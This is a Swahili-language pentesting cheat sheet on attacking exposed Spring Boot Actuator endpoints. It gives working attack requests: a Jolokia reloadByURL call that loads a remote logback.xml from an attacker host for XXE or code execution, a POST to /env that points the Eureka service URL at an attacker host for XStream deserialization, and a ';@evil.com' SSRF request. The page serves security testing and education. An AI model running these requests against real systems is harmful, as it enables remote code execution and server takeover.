Spring Auth Bypass

Kutoka kwa https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****

Kutumia Spring Boot Actuators

Angalia chapisho halisi kutoka [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]

Mambo Muhimu:

• Spring Boot Actuators hujisajili kwa njia kama vile /health, /trace, /beans, /env, n.k. Katika toleo 1 hadi 1.4, sehemu hizi zinapatikana bila uwakilishi. Kutoka toleo 1.5 kuendelea, ni /health na /info pekee ambazo sio nyeti kwa default, lakini wabunifu mara nyingi huzima usalama huu.

• Baadhi ya sehemu za Actuator zinaweza kufunua data nyeti au kuruhusu hatua zenye madhara:

• /dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart, na /heapdump.

• Katika Spring Boot 1.x, actuators zinasajiliwa chini ya URL ya msingi, wakati katika 2.x, zinasajiliwa chini ya njia ya msingi ya /actuator/.

Mbinu za Kutumia:

1. Utekelezaji wa Kanuni Kijijini kupitia '/jolokia':

• Sehemu ya actuator ya /jolokia inafunua Maktaba ya Jolokia, ambayo inaruhusu ufikiaji wa HTTP kwa MBeans.

• Hatua ya reloadByURL inaweza kutumika kutekeleza upya mizunguko ya kuingiza kutoka kwa URL ya nje, ambayo inaweza kusababisha XXE ya upofu au Utekelezaji wa Kanuni Kijijini kupitia mizunguko iliyoundwa ya XML.

• URL ya kutekeleza mfano: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.

2. Ubunifu wa Mipangilio kupitia '/env':

• Ikiwa Maktaba za Spring Cloud zipo, sehemu ya /env inaruhusu ubadilishaji wa mali ya mazingira.

• Mali zinaweza kubadilishwa kudanganya udhaifu, kama vile udhaifu wa uhariri wa XStream katika huduma ya Eureka serviceURL.

• Ombi la POST la mfano la ubunifu:

POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream

3. Mipangilio Mingine Muhimu:

• Mali kama spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url, na spring.datasource.tomcat.max-active zinaweza kubadilishwa kwa mbinu mbalimbali za kudanganya, kama vile kuingiza SQL au kubadilisha misemo ya uunganisho wa database.

Maelezo Zaidi:

• Orodha kamili ya actuators za msingi inaweza kupatikana hapa.

• Sehemu ya /env katika Spring Boot 2.x hutumia muundo wa JSON kwa ubadilishaji wa mali, lakini dhana kuu inabaki ile ile.

Mada Zinazohusiana:

1. Env + H2 RCE:

• Maelezo kuhusu kutumia mchanganyiko wa sehemu ya /env na database ya H2 yanaweza kupatikana hapa.

2. SSRF kwenye Spring Boot Kupitia Ufafanuzi Mbaya wa Jina la Njia:

• Kushughulikia kwa Spring framework ya vigezo vya matriki (;) katika majina ya njia za HTTP kunaweza kutumika kwa Server-Side Request Forgery (SSRF).

• Ombi la ubunifu la kudanganya:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close